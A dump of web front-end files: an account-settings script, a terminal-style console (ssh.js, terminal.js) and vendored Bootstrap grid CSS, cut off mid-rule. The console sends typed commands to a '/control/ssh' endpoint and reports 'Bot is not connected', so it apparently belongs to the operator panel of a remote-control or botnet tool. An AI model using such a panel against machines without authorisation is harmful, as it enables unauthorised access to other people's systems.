$('#confirm-password').val(), }, beforeSend: (request) => { request.setRequestHeader('X-CSRFToken', $('#csrf_token').val()); }, }) .done((resp) => { for (let i in resp) { if (resp[i]['status'] && resp[i]['msg']) { setValid($('#' + i), $('#' + i + '-resp')); $('#' + i + '-resp').text(resp[i]['msg']); } if (resp[i]['status'] === 0 && resp[i]['msg']) { setInvalid($('#' + i), $('#' + i + '-resp')); $('#' + i + '-resp').text(resp[i]['msg']); } } if (resp['new-username'].status === 1) { $('#new-username').attr('placeholder', $('#new-username').val()); $('#new-username').val(''); } if (resp['new-password'].status === 1) { $('#current-password').val(''); $('#new-password').val(''); $('#confirm-password').val(''); setClear($('#current-password'), $('#current-password')); } disableLoader(); setAccountStatus(); isProcessing = false; }) .fail(() => { disableLoader(); isProcessing = false; }); } function enableLoader() { $('#update-username-password-loader').removeClass('d-none'); $('#update-username-password-loader').addClass('d-block'); $('#btn-update-username-password').addClass('d-none'); } function disableLoader() { $('#update-username-password-loader').addClass('d-none'); $('#update-username-password-loader').removeClass('d-block'); $('#btn-update-username-password').removeClass('d-none'); } function setAccountStatus() { $.ajax({ type: 'GET', url: '/get-account-status', beforeSend: (request) => { request.setRequestHeader('X-CSRFToken', $('#csrf_token').val()); }, }).done((resp) => { if (resp['msg']) { $('#notice').text(resp['msg']); $('#account-status-msg').removeClass('d-none'); } else { $('#account-status-msg').addClass('d-none'); } }); } ================================================ FILE: static/js/ssh.js ================================================ 'use strict'; const SshEnum = { help: 'menu' }; class SSH extends Terminal { constructor() { Terminal.isSSH = true; super(); } get mainMenu() { return ( '

' + 'Type [command] + Enter' + '

' + '
    ' + "
  • 'menu' -- display this list
  • " + "
  • 'cls' -- clear screeen
  • " + "
  • 'help' -- display help
  • " + "
  • 'type [filename]' -- read a file
  • " + "
  • 'systeminfo' -- display system information
  • " + '
' ); } execute(cmd) { if (cmd.toLowerCase() === SshEnum.help) { this.stopExe(cmd, ''); $('#console-output').append(terminalObj.mainMenu); this.scroll(); return; } this.startExe(); $.ajax({ type: 'POST', url: '/control/ssh', data: { cmd: cmd }, beforeSend: request => { request.setRequestHeader('X-CSRFToken', $('#csrf_token').val()); } }) .done(resp => { let msg; if (resp['resp'].length !== 0) { msg = resp['resp']; } else { msg = 'Bot is not connected'; } if (Terminal.isSSH) { this.stopExe(cmd, msg); } else { this.stopExe('', ''); } if (resp['resp'].length === 0) { disableConsole(); updateStatus(); } }) .fail(() => { this.stopExe(cmd, 'Failed to contact server'); }); } } ================================================ FILE: static/js/terminal.js ================================================ 'use strict'; const MAX_OUTPUT_HISTORY_SIZE = 32; const MAX_HISTORY_SIZE = 256; const MAX_CHARS = 8192; class Terminal { static isSSH = false; static commandOutputHistory = []; static SSHOutputHistory = []; static commandConsoleHistory = []; static SSHConsoleHistory = []; static commandCurrentPosition = 0; static SSHCurrentPosition = 0; static commandCurrentInput = ''; static SSHCurrenInput = ''; static isProcessing = false; constructor() { enableInput(); enableTabs(); $('#console-output').text(''); if (this.consoleHistory.length === 0) { $('#console-output').append(this.mainMenu); } else { this.populateOutput(); } $('#console-input').val(this.currentInput); $('#console-input').focus(); } static addtoSSHHistory(input, output) { if (Terminal.SSHOutputHistory.length >= MAX_OUTPUT_HISTORY_SIZE) { Terminal.SSHOutputHistory.shift(); } Terminal.SSHOutputHistory.push({ input: input, output: output.slice(0, MAX_CHARS) }); } static addtoCommandHistory(input, output) { if (Terminal.commandOutputHistory.length >= MAX_OUTPUT_HISTORY_SIZE) { Terminal.commandOutputHistory.shift(); } Terminal.commandOutputHistory.push({ input: input, output: output.slice(0, MAX_CHARS) }); } get outputHistory() { return Terminal.isSSH ? Terminal.SSHOutputHistory : Terminal.commandOutputHistory; } get consoleHistory() { return Terminal.isSSH ? Terminal.SSHConsoleHistory : Terminal.commandConsoleHistory; } get currentPosition() { return Terminal.isSSH ? Terminal.SSHCurrentPosition : Terminal.commandCurrentPosition; } set currentPosition(value) { if (Terminal.isSSH) { Terminal.SSHCurrentPosition = value; } else { Terminal.commandCurrentPosition = value; } } get isProcessing() { return Terminal.isProcessing; } set isProcessing(value) { Terminal.isProcessing = value; } get currentInput() { return Terminal.isSSH ? Terminal.SSHCurrenInput : Terminal.commandCurrentInput; } set currentInput(value) { if (Terminal.isSSH) { Terminal.SSHCurrenInput = value; } else { Terminal.commandCurrentInput = value; } } populateOutput() { this.outputHistory.forEach((h) => { $('#console-output').append(h['output']); }); this.scroll(); } addtoConsoleHistory(input) { if (Terminal.isSSH) { if (Terminal.SSHConsoleHistory.length >= MAX_HISTORY_SIZE) { Terminal.SSHConsoleHistory.shift(); } Terminal.SSHConsoleHistory.push(input); } else { if (Terminal.commandConsoleHistory.length >= MAX_HISTORY_SIZE) { Terminal.commandConsoleHistory.shift(); } Terminal.commandConsoleHistory.push(input); } } get mainMenu() { throw Exception.NotImplemented; } execute(_cmd) { throw Exception.NotImplemented; } startExe() { if (!this.isProcessing) { this.isProcessing = true; disableInput(); } } stopExe(input, output) { if (this.isProcessing) { enableInput(); this.isProcessing = false; } $('#console-input').val(''); if (input) { this.consoleOutput(input, output); } } constructOuput(input, ouput) { let p = $('

', { class: 'console-output-section' }); p.append($('', { class: 'console-output-input-cmd' }).text(input)); p.append($('', { class: 'console-output-output' }).text(ouput)); return p; } consoleOutput(input, output) { let _output = output; output = this.constructOuput(input, output); if (_output.trim().length) { let histOutput = this.constructOuput(input, _output.slice(0, MAX_CHARS)); if (Terminal.isSSH) { Terminal.addtoSSHHistory(input, histOutput); } else { Terminal.addtoCommandHistory(input, histOutput); } } $('#console-output').append(output); this.scroll(); } scroll() { $('.console-display').scrollTop($('.console-display').prop('scrollHeight')); } } function disableInput() { let consoleInput = $('#console-input'); consoleInput.prop('disabled', true); $('.console-input-container').addClass('disabled-console-input'); } function enableInput() { let consoleInput = $('#console-input'); consoleInput.prop('disabled', false); $('.console-input-container').removeClass('disabled-console-input'); $('#console-input').focus(); } function disableTabs() { $('.console ul.nav li').each((_, e) => { $(e).addClass('disabled-tab'); }); } function enableTabs() { $('.console ul.nav li').each((_, e) => { $(e).removeClass('disabled-tab'); }); } function disabledTerminalObj() { terminalObj = null; } function disableConsole() { disableInput(); disableTabs(); disabledTerminalObj(); } ================================================ FILE: static/vendor/bootstrap-4.4.1-dist/css/bootstrap-grid.css ================================================ /*! * Bootstrap Grid v4.4.1 (https://getbootstrap.com/) * Copyright 2011-2019 The Bootstrap Authors * Copyright 2011-2019 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */ html { box-sizing: border-box; -ms-overflow-style: scrollbar; } *, *::before, *::after { box-sizing: inherit; } .container { width: 100%; padding-right: 15px; padding-left: 15px; margin-right: auto; margin-left: auto; } @media (min-width: 576px) { .container { max-width: 540px; } } @media (min-width: 768px) { .container { max-width: 720px; } } @media (min-width: 992px) { .container { max-width: 960px; } } @media (min-width: 1200px) { .container { max-width: 1140px; } } .container-fluid, .container-sm, .container-md, .container-lg, .container-xl { width: 100%; padding-right: 15px; padding-left: 15px; margin-right: auto; margin-left: auto; } @media (min-width: 576px) { .container, .container-sm { max-width: 540px; } } @media (min-width: 768px) { .container, .container-sm, .container-md { max-width: 720px; } } @media (min-width: 992px) { .container, .container-sm, .container-md, .container-lg { max-width: 960px; } } @media (min-width: 1200px) { .container, .container-sm, .container-md, .container-lg, .container-xl { max-width: 1140px; } } .row { display: -ms-flexbox; display: flex; -ms-flex-wrap: wrap; flex-wrap: wrap; margin-right: -15px; margin-left: -15px; } .no-gutters { margin-right: 0; margin-left: 0; } .no-gutters > .col, .no-gutters > [class*="col-"] { padding-right: 0; padding-left: 0; } .col-1, .col-2, .col-3, .col-4, .col-5, .col-6, .col-7, .col-8, .col-9, .col-10, .col-11, .col-12, .col, .col-auto, .col-sm-1, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-sm-10, .col-sm-11, .col-sm-12, .col-sm, .col-sm-auto, .col-md-1, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-md-10, .col-md-11, .col-md-12, .col-md, .col-md-auto, .col-lg-1, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-lg-10, .col-lg-11, .col-lg-12, .col-lg, .col-lg-auto, .col-xl-1, .col-xl-2, .col-xl-3, .col-xl-4, .col-xl-5, .col-xl-6, .col-xl-7, .col-xl-8, .col-xl-9, .col-xl-10, .col-xl-11, .col-xl-12, .col-xl, .col-xl-auto { position: relative; width: 100%; padding-right: 15px; padding-left: 15px; } .col { -ms-flex-preferred-size: 0; flex-basis: 0; -ms-flex-positive: 1; flex-grow: 1; max-width: 100%; } .row-cols-1 > * { -ms-flex: 0 0 100%; flex: 0 0 100%; max-width: 100%; } .row-cols-2 > * { -ms-flex: 0 0 50%; flex: 0 0 50%; max-width: 50%; } .row-cols-3 > * { -ms-flex: 0 0 33.333333%; flex: 0 0 33.333333%; max-width: 33.333333%; } .row-cols-4 > * { -ms-flex: 0 0 25%; flex: 0 0 25%; max-width: 25%; } .row-cols-5 > * { -ms-flex: 0 0 20%; flex: 0 0 20%; max-width: 20%; } .row-cols-6 > * { -ms-flex: 0 0 16.666667%; flex: 0 0 16.666667%; max-width: 16.666667%; } .col-auto { -ms-flex: 0 0 auto; flex: 0 0 auto; width: auto; max-width: 100%; } .col-1 { -ms-flex: 0 0 8.333333%; flex: 0 0 8.333333%; max-width: 8.333333%; } .col-2 { -ms-flex: 0 0 16.666667%; flex: 0 0 16.666667%; max-width: 16.666667%; } .col-3 { -ms-flex: 0 0 25%; flex: 0 0 25%; max-width: 25%; } .col-4 { -ms-flex: 0 0 33.333333%; flex: 0 0 33.333333%; max-width: 33.333333%; } .col-5 { -ms-flex: 0 0 41.666667%; flex: 0 0 41.666667%; max-width: 41.666667%; } .col-6 { -ms-flex: 0 0 50%; flex: 0 0 50%; max-width: 50%; } .col-7 { -ms-flex: 0 0 58.333333%; flex: 0 0 58.333333%; max-width: 58.333333%; } .col-8 { -ms-flex: 0 0 66.666667%; flex: 0 0 66.666667%; max-width: 66.666667%; } .col-9 { -ms-flex: 0 0 75%; flex: 0 0 75%; max-width: 75%; } .col-10 { -ms-flex: 0 0 83.333333%; flex: 0 0 83.333333%; max-width: 83.333333%; } .col-11 { -ms-flex: 0 0 91.666667%; flex: 0 0 91.666667%; max-width: 91.666667%; } .col-12 { -ms-flex: 0 0 100%; flex: 0 0 100%; max-width: 100%; } .order-first { -ms-flex-order: -1; order: -1; } .order-last { -ms-flex-order: 13; order: 13; } .order-0 { -ms-flex-order: 0; order: 0; } .order-1 { -ms-flex-order: 1; order: 1; } .order-2 { -ms-flex-order: 2; order: 2; } .order-3 { -ms-flex-order: 3; order: 3; } .order-4 { -ms-flex-order: 4; order: 4; } .order-5 { -ms-flex-order: 5; order: 5; } .order-6 { -ms-flex-order: 6; order: 6; } .order-7 { -ms-flex-order: 7; order: 7; } .order-8 { -ms-flex-order: 8; order: 8; } .order-9 { -ms-flex-order: 9; order: 9; } .order-10 { -ms-flex-order: 10; order: 10; } .order-11 { -ms-flex-order: 11; order: 11; } .order-12 { -ms-flex-order: 12; order: 12; } .offset-1 { margin-left: 8.333333%; } .offset-2 { margin-left: 16.666667%; } .offset-3 { margin-left: 25%; } .offset-4 { margin-left: 33.333333%; } .offset-5 { margin-left: 41.666667%; } .offset-6 { margin-left: 50%; } .offset-7 { margin-left: 58.333333%; } .offset-8 { margin-left: 66.666667%; } .offset-9 { margin-left: 75%; } .offset-10 { margin-left: 83.333333%; } .offset-11 { margin-left: 91.666667%; } @media (min-width: 576px) { .col-sm { -ms-flex-preferred-size: 0; flex-basis: 0; -ms-flex-positive: 1; flex-grow: 1; max-width: 100%; } .row-cols-sm-1 > * { -ms-flex: 0 0 100%; flex: 0 0 100%; max-width: 100%; } .row-cols-sm-2 > * { -ms-flex: 0 0 50%; flex: 0 0 50%; max-width: 50%; } .row-cols-sm-3 > * { -ms-flex: 0 0 33.333333%; flex: 0 0 33.333333%; max-width: 33.333333%; } .row-cols-sm-4 > * { -ms-flex: 0 0 25%; flex: 0 0 25%; max-width: 25%; } .row-cols-sm-5 > * { -ms-flex: 0 0 20%; flex: 0 0 20%; max-width: 20%; } .row-cols-sm-6 > * { -ms-flex: 0 0 16.666667%; flex: 0 0 16.666667%; max-width: 16.666667%; } .col-sm-auto { -ms-flex: 0 0 auto; flex: 0 0 auto; width: auto; max-width: 100%; } .col-sm-1 { -ms-flex: 0 0 8.333333%; flex: 0 0 8.333333%; max-width: 8.333333%; } .col-sm-2 { -ms-flex: 0 0 16.666667%; flex: 0 0 16.666667%; max-width: 16.666667%; } .col-sm-3 { -ms-flex: 0 0 25%; flex: 0 0 25%; max-width: 25%; } .col-sm-4 { -ms-flex: 0 0 33.333333%; flex: 0 0 33.333333%; max-width: 33.333333%; } .col-sm-5 { -ms-flex: 0 0 41.666667%; flex: 0 0 41.666667%; max-width: 41.666667%; } .col-sm-6 { -ms-flex: 0 0 50%; flex: 0 0 50%; max-width: 50%; } .col-sm-7 { -ms-flex: 0 0 58.333333%; flex: 0 0 58.333333%; max-width: 58.333333%; } .col-sm-8 { -ms-flex: 0 0 66.666667%; flex: 0 0 66.666667%; max-width: 66.666667%; } .col-sm-9 { -ms-flex: 0 0 75%; flex: 0 0 75%; max-width: 75%; } .col-sm-10 { -ms-flex: 0 0 83.333333%; flex: 0 0 83.333333%; max-width: 83.333333%; } .col-sm-11 { -ms-flex: 0 0 91.666667%; flex: 0 0 91.666667%; max-width: 91.666667%; } .col-sm-12 { -ms-flex: 0 0 100%; flex: 0 0 100%; max-width: 100%; } .order-sm-first { -ms-flex-order: -1; order: -1; } .order-sm-last { -ms-flex-order: 13; order: 13; } .order-sm-0 { -ms-flex-order: 0; order: 0; } .order-sm-1 { -ms-flex-order: 1; order: 1; } .order-sm-2 { -ms-flex-order: 2; order: 2; } .order-sm-3 { -ms-flex-order: 3; order: 3; } .order-sm-4 { -ms-flex-order: 4; order: 4; } .order-sm-5 { -ms-flex-order: 5; order: 5; } .order-sm-6 { -ms-flex-order: 6; order: 6; } .order-sm-7 { -ms-flex-order: 7; order: 7; } .order-sm-8 { -ms-flex-order: 8; order: 8; } .order-sm-9 { -ms-flex-order: 9; order: 9; } .order-sm-10 { -ms-flex-order: 10; order: 10; } .order-sm-11 { -ms-flex-order: 11; order: 11; } .order-sm-12 { -ms-flex-order: 12; order: 12; } .offset-sm-0 { margin-left: 0; } .offset-sm-1 { margin-left: 8.333333%; } .offset-sm-2 { margin-left: 16.666667%; } .offset-sm-3 { margin-left: 25%; } .offset-sm-4 { margin-left: 33.333333%; } .offset-sm-5 { margin-left: 41.666667%; } .offset-sm-6 { margin-left: 50%; } .offset-sm-7 { margin-left: 58.333333%; } .offset-sm-8 { margin-left: 66.666667%; } .offset-sm-9 { margin-left: 75%; } .offset-sm-10 { margin-left: 83.333333%; } .offset-sm-11 { margin-left: 91.666667%; } } @media (min-width: 768px) { .col-md { -ms-flex-preferred-size: 0; flex-basis: 0; -ms-flex-positive: 1; flex-grow: 1; max-width: 100%; } .row-cols-md-1 > * { -ms-flex: 0 0 100%; flex: 0 0 100%; max-width: 100%; } .row-cols-md-2 > * { -ms-flex: 0 0 50%; flex: 0 0 50%; max-width: 50%; } .row-cols-md-3 > * { -ms-flex: 0 0 33.333333%; flex: 0 0 33.333333%; max-width: 33.333333%; } .row-cols-md-4 > * { -ms-flex: 0 0 25%; flex: 0 0 25%; max-width: 25%; } .row-cols-md-5 > * { -ms-flex: 0 0 20%; flex: 0 0 20%; max-width: 20%; } .row-cols-md-6 > * { -ms-flex: 0 0 16.666667%; flex: 0 0 16.666667%; max-width: 16.666667%; } .col-md-auto { -ms-flex: 0 0 auto; flex: 0 0 auto; width: auto; max-width: 100%; } .col-md-1 { -ms-flex: 0 0 8.333333%; flex: 0 0 8.333333%; max-width: 8.333333%; } .col-md-2 { -ms-flex: 0 0 16.666667%; flex: 0 0 16.666667%; max-width: 16.666667%; } .col-md-3 { -ms-flex: 0 0 25%; flex: 0 0 25%; max-width: 25%; } .col-md-4 { -ms-flex: 0 0 33.333333%; flex: 0 0 33.333333%; max-width: 33.333333%; } .col-md-5 { -ms-flex: 0 0 41.666667%; flex: 0 0 41.666667%; max-width: 41.666667%; } .col-md-6 { -ms-flex: 0 0 50%; flex: 0 0 50%; max-width: 50%; } .col-md-7 { -ms-flex: 0 0 58.333333%; flex: 0 0 58.333333%; max-width: 58.333333%; } .col-md-8 { -ms-flex: 0 0 66.666667%; flex: 0 0 66.666667%; max-width: 66.666667%; } .col-md-9 { -ms-flex: 0 0 75%; flex: 0 0 75%; max-width: 75%; } .col-md-10 { -ms-flex: 0 0 83.333333%; flex: 0 0 83.333333%; max-width: 83.333333%; } .col-md-11 { -ms-flex: 0 0 91.666667%; flex: 0 0 91.666667%; max-width: 91.666667%; } .col-md-12 { -ms-flex: 0 0 100%; flex: 0 0 100%; max-width: 100%; } .order-md-first { -ms-flex-order: -1; order: -1; } .order-md-last { -ms-flex-order: 13; order: 13; } .order-md-0 { -ms-flex-order: 0; order: 0; } .order-md-1 { -ms-flex-order: 1; order: 1; } .order-md-2 { -ms-flex-order: 2; order: 2; } .order-md-3 { -ms-flex-order: 3; order: 3; } .order-md-4 { -ms-flex-order: 4; order: 4; } .order-md-5 { -ms-flex-order: 5; order: 5; } .order-md-6 { -ms-flex-order: 6; order: 6; } .order-md-7 { -ms-flex-order: 7; order: 7; } .order-md-8 { -ms-flex-order: 8; order: 8; } .order-md-9 { -ms-flex-order: 9; order: 9; } .order-md-10 { -ms-flex-order: 10; order: 10; } .order-md-11 { -ms-flex-order: 11; order: 11; } .order-md-12 { -ms-flex-order: 12; order: 12; } .offset-md-0 { margin-left: 0; } .offset-md-1 { margin-left: 8.333333%; } .offset-md-2 { margin-left: 16.666667%; } .offset-md-3 { margin-left: 25%; } .offset-md-4 { margin-left: 33.333333%; } .offset-md-5 { margin-left: 41.666667%; } .offset-md-6 { margin-left: 50%; } .offset-md-7 { margin-left: 58.333333%; } .offset-md-8 { margin-left: 66.666667%; } .offset-md-9 { margin-left: 75%; } .offset-md-10 { margin-left: 83.333333%; } .offset-md-11 { margin-left: 91.666667%; } } @media (min-width: 992px) { .col-lg { -ms-flex-preferred-size: 0; flex-basis: 0; -ms-flex-positive: 1; flex-grow: 1; max-width: 100%; } .row-cols-lg-1 > * { -ms-flex: 0 0 100%; flex: 0 0 100%; max-width: 100%; } .row-cols-lg-2 > * { -ms-flex: 0 0 50%; flex: 0 0 50%; max-width: 50%; } .row-cols-lg-3 > * { -ms-flex: 0 0 33.333333%; flex: 0 0 33.333333%; max-width: 33.333333%; } .row-cols-lg-4 > * { -ms-flex: 0 0 25%; flex: 0 0 25%; max-width: 25%; } .row-cols-lg-5 > * { -ms-flex: 0 0 20%; flex: 0 0 20%; max-width: 20%; } .row-cols-lg-6 > * { -ms-flex: 0 0 16.666667%; flex: 0 0 16.666667%; max-width: 16.666667%; } .col-lg-auto { -ms-flex: 0 0 auto; flex: 0 0 auto; width: auto; max-width: 100%; } .col-lg-1 { -ms-flex: 0 0 8.333333%; flex: 0 0 8.333333%; max-width: 8.333333%; } .col-lg-2 { -ms-flex: 0 0 16.666667%; flex: 0 0 16.666667%; max-width: 16.666667%; } .col-lg-3 { -ms-flex: 0 0 25%; flex: 0 0 25%; max-width: 25%; } .col-lg-4 { -ms-flex: 0 0 33.333333%; flex: 0 0 33.333333%; max-width: 33.333333%; } .col-lg-5 { -ms-flex: 0 0 41.666667%; flex: 0 0 41.666667%; max-width: 41.666667%; } .col-lg-6 { -ms-flex: 0 0 50%; flex: 0 0 50%; max-width: 50%; } .col-lg-7 { -ms-flex: 0 0 58.333333%; flex: 0 0 58.333333%; max-width: 58.333333%; } .col-lg-8 { -ms-flex: 0 0 66.666667%; flex: 0 0 66.666667%; max-width: 66.666667%; } .col-lg-9 { -ms-flex: 0 0 75%; flex: 0 0 75%; max-width: 75%; } .col-lg-10 { -ms-flex: 0 0 83.333333%; flex: 0 0 83.333333%; max-width: 83.333333%; } .col-lg-11 { -ms-flex: 0 0 91.666667%; flex: 0 0 91.666667%; max-width: 91.666667%; } .col-lg-12 { -ms-flex: 0 0 100%; flex: 0 0 100%; max-width: 100%; } .order-lg-first { -ms-flex-order: -1; order: -1; } .order-lg-last { -ms-flex-order: 13; order: 13; } .order-lg-0 { -ms-flex-order: 0; order: 0; } .order-lg-1 { -ms-flex-order: 1; order: 1; } .order-lg-2 { -ms-flex-order: 2; order: 2; } .order-lg-3 { -ms-flex-order: 3; order: 3; } .order-lg-4 { -ms-flex-order: 4; order: 4; } .order-lg-5 { -ms-flex-order: 5; order: 5; } .order-lg-6 { -ms-flex-order: 6; order: 6; } .order-lg-7 { -ms-flex-order: 7; order: 7; } .order-lg-8 { -ms-flex-order: 8; order: 8; } .order-lg-9 { -ms-flex-order: 9; order: 9; } .order-lg-10 { -ms-flex-order: 10; order: 10; } .order-lg-11 { -ms-flex-order: 11; order: 11; } .order-lg-12 { -ms-flex-order: 12; order: 12; } .offset-lg-0 { margin-left: 0; } .offset-lg-1 { margin-left: 8.333333%; } .offset-lg-2 { margin-left: 16.666667%; } .offset-lg-3 { margin-left: 25%; } .offset-lg-4 { margin-left: 33.333333%; } .offset-lg-5 { margin-left: 41.666667%; } .offset-lg-6 { margin-left: 50%; } .offset-lg-7 { margin-left: 58.333333%; } .offset-lg-8 { margin-left: 66.666667%; } .offset-lg-9 { margin-left: 75%; } .offset-lg-10 { margin-left: 83.333333%; } .offset-lg-11 { margin-left: 91.666667%; } } @media (min-width: 1200px) { .col-xl { -ms-flex-preferred-size: 0; flex-basis: 0; -ms-flex-positive: 1; flex-grow: 1; max-width: 100%; } .row-cols-xl-1 > * { -ms-flex: 0 0 100%; flex: 0 0 100%; max-width: 100%; } .row-cols-xl-2 > * { -ms-flex: 0 0 50%; flex: 0 0 50%; max-width: 50%; } .row-cols-xl-3 > * { -ms-flex: 0 0 33.333333%; flex: 0 0 33.333333%; max-width: 33.333333%; } .row-cols-xl-4 > * { -ms-flex: 0 0 25%; flex: 0 0 25%; max-width: 25%; } .row-cols-xl-5 > * { -ms-flex: 0 0 20%; flex: 0 0 20%; max-width: 20%; } .row-cols-xl-6 > * { -ms-flex: 0 0 16.666667%; flex: 0 0 16.666667%; max-width: 16.666667%; } .col-xl-auto { -ms-flex: 0 0 auto; flex: 0 0 auto; width: auto; max-width: 100%; } .col-xl-1 { -ms-flex: 0 0 8.333333%; flex: 0 0 8.333333%; max-width: 8.333333%; } .col-xl-2 { -ms-flex: 0 0 16.666667%; flex: 0 0 16.666667%; max-width: 16.666667%; } .col-xl-3 { -ms-flex: 0 0 25%; flex: 0 0 25%; max-width: 25%; } .col-xl-4 { -ms-flex: 0 0 33.333333%; flex: 0 0 33.333333%; max-width: 33.333333%; } .col-xl-5 { -ms-flex: 0 0 41.666667%; flex: 0 0 41.666667%; max-width: 41.666667%; } .col-xl-6 { -ms-flex: 0 0 50%; flex: 0 0 50%; max-width: 50%; } .col-xl-7 { -ms-flex: 0 0 58.333333%; flex: 0 0 58.333333%; max-width: 58.333333%; } .col-xl-8 { -ms-flex: 0 0 66.666667%; flex: 0 0 66.666667%; max-width: 66.666667%; } .col-xl-9 { -ms-flex: 0 0 75%; flex: 0 0 75%; max-width: 75%; } .col-xl-10 { -ms-flex: 0 0 83.333333%; flex: 0 0 83.333333%; max-width: 83.333333%; } .col-xl-11 { -ms-flex: 0 0 91.666667%; flex: 0 0 91.666667%; max-width: 91.666667%; } .col-xl-12 { -ms-flex: 0 0 100%; flex: 0 0 100%; max-width: 100%; } .order-xl-first { -ms-flex-order: -1; order: -1; } .order-xl-last { -ms-flex-order: 13; order: 13; } .order-xl-0 { -ms-flex-order: 0; order: 0; } .order-xl-1 { -ms-flex-order: 1; order: 1; } .order-xl-2 { -ms-flex-order: 2; order: 2; } .order-xl-3 { -ms-flex-order: 3; order: 3; } .order-xl-4 { -ms-flex-order: 4; order: 4; } .order-xl-5 { -ms-flex-order: 5; order: 5; } .order-xl-6 { -ms-flex-order: 6; order: 6; } .order-xl-7 { -ms-flex-order: 7; order: 7; } .order-xl-8 { -ms-flex-order: 8; order: 8; } .order-xl-9 { -ms-flex-order: 9; order: 9; } .order-xl-10 { -ms-flex-order: 10; order: 10; } .order-xl-11 { -ms-flex-order: 11; order: 11; } .order-xl-12 { -ms-flex-order: 12; order: 12; } .offset-xl-0 { margin-left: 0; } .offset-xl-1 { margin-left: 8.333333%; } .offset-xl-2 { margin-left: 16.666667%; } .offset-xl-3 { margin-left: 25%; } .offset-xl-4 { margin-left: 33.333333%; } .offset-xl-5 { margin-left: 41.666667%; } .offset-xl-6 { margin-left: 50%; } .offset-xl-7 { margin-left: 58.333333%; } .offset-xl-8 { margin-left: 66.666667%; } .offset-xl-9 { margin-left: 75%; } .offset-xl-10 { margin-left: 83.333333%; } .offset-xl-11 { margin-left: 91.666667%; } } .d-none { display: none !important; } .d-inline { display: inline !important; } .d-inline-block { display: inline-block !important; } .d-block { display: block !important; } .d-table { display: table !important; } .d-table-row { display: table-row !important; } .d-table-cell { display: table-cell !important; } .d-flex { display: -ms-flexbox !important; display: flex !important; } .d-inline-flex { display: -ms-inline-flexbox !important; display: inline-flex !important; } @media (min-width: 576px) { .d-sm-none { display: none !important; } .d-sm-inline { display: inline !important; } .d-sm-inline-block { display: inline-block !important; } .d-sm-block { display: block !important; } .d-sm-table { display: table !important; } .d-sm-table-row { display: table-row !important; } .d-sm-table-cell { display: table-cell !important; } .d-sm-flex { display: -ms-flexbox !important; display: flex !important; } .d-sm-inline-flex { display: -ms-inline-flexbox !important; display: inline-flex !important; } } @media (min-width: 768px) { .d-md-none { display: none !important; } .d-md-inline { display: inline !important; } .d-md-inline-block { display: inline-block !important; } .d-md-block { display: block !important; } .d-md-table { display: table !important; } .d-md-table-row { display: table-row !important; } .d-md-table-cell { display: table-cell !important; } .d-md-flex { display: -ms-flexbox !important; display: flex !important; } .d-md-inline-flex { display: -ms-inline-flexbox !important; display: inline-flex !important; } } @media (min-width: 992px) { .d-lg-none { display: none !important; } .d-lg-inline { display: inline !important; } .d-lg-inline-block { display: inline-block !important; } .d-lg-block { display: block !important; } .d-lg-table { display: table !important; } .d-lg-table-row { display: table-row !important; } .d-lg-table-cell { display: table-cell !important; } .d-lg-flex { display: -ms-flexbox !important; display: flex !important; } .d-lg-inline-flex { display: -ms-inline-flexbox !important; display: inline-flex !important; } } @media (min-width: 1200px) { .d-xl-none { display: none !important; } .d-xl-inline { display: inline !important; } .d-xl-inline-block { display: inline-block !important; } .d-xl-block { display: block !important; } .d-xl-table { display: table !important; } .d-xl-table-row { display: table-row !important; } .d-xl-table-cell { display: table-cell !important; } .d-xl-flex { display: -ms-flexbox !important; display: flex !important; } .d-xl-inline-flex { display: -ms-inline-flexbox !important; display: inline-flex !important; } } @media print { .d-print-none { display: none !important; } .d-print-inline { display: inline !important; } .d-print-inline-block { display: inline-block !important; } .d-print-block { display: block !important; } .d-print-table { display: table !important; } .d-print-table-row { display: table-row !important; } .d-print-table-cell { display: table-cell !important; } .d-print-flex { display: -ms-flexbox !important; display: flex !important; } .d-print-inline-flex { display: -ms-inline-flexbox !important; display: inline-flex !important; } } .flex-row { -ms-flex-direction: row !important; flex-direction: row !important; } .flex-column { -ms-flex-direction: column !important; flex-direction: column !important; } .flex-row-reverse { -ms-flex-direction: row-reverse !important; flex-direction: row-reverse !important; } .flex-column-reverse { -ms-flex-direction: column-reverse !important; flex-direction: column-reverse !important; } .flex-wrap { -ms-flex-wrap: wrap !important; flex-wrap: wrap !important; } .flex-nowrap { -ms-flex-wrap: nowrap !important; flex-wrap: nowrap !important; } .flex-wrap-reverse { -ms-flex-wrap: wrap-reverse !important; flex-wrap: wrap-reverse !important; } .flex-fill { -ms-flex: 1 1 auto !important; flex: 1 1 auto !important; } .flex-grow-0 { -ms-flex-positive: 0 !important; flex-grow: 0 !important; } .flex-grow-1 { -ms-flex-positive: 1 !important; flex-grow: 1 !important; } .flex-shrink-0 { -ms-flex-negative: 0 !important; flex-shrink: 0 !important; } .flex-shrink-1 { -ms-flex-negative: 1 !important; flex-shrink: 1 !important; } .justify-content-start { -ms-flex-pack: start !important; justify-content: flex-start !important; } .justify-content-end { -ms-flex-pack: end !important; justify-content: flex-end !important; } .justify-content-center { -ms-flex-pack: center !important; justify-content: center !important; } .justify-content-between { -ms-flex-pack: justify !important; justify-content: space-between !important; } .justify-content-around { -ms-flex-pack: distribute !important; justify-content: space-around !important; } .align-items-start { -ms-flex-align: start !important; align-items: flex-start !important; } .align-items-end { -ms-flex-align: end !important; align-items: flex-end !important; } .align-items-center { -ms-flex-align: center !important; align-items: center !important; } .align-items-baseline { -ms-flex-align: baseline !important; align-items: baseline !important; } .align-items-stretch { -ms-flex-align: stretch !important; align-items: stretch !important; } .align-content-start { -ms-flex-line-pack: start !important; align-content: flex-start !important; } .align-content-end { -ms-flex-line-pack: end !important; align-content: flex-end !important; } .align-content-center { -ms-flex-line-pack: center !important; align-content: center !important; } .align-content-between { -ms-flex-line-pack: justify !important; align-content: space-between !important; } .align-content-around { -ms-flex-line-pack: distribute !important; align-content: space-around !important; } .align-content-stretch { -ms-flex-line-pack: stretch !important; align-content: stretch !important; } .align-self-auto { -ms-flex-item-align: auto !important; align-self: auto !important; } .align-self-start { -ms-flex-item-align: start !important; align-self: flex-start !important; } .align-self-end { -ms-flex-item-align: end !important; align-self: flex-end !important; } .align-self-center { -ms-flex-item-align: center !important; align-self: center 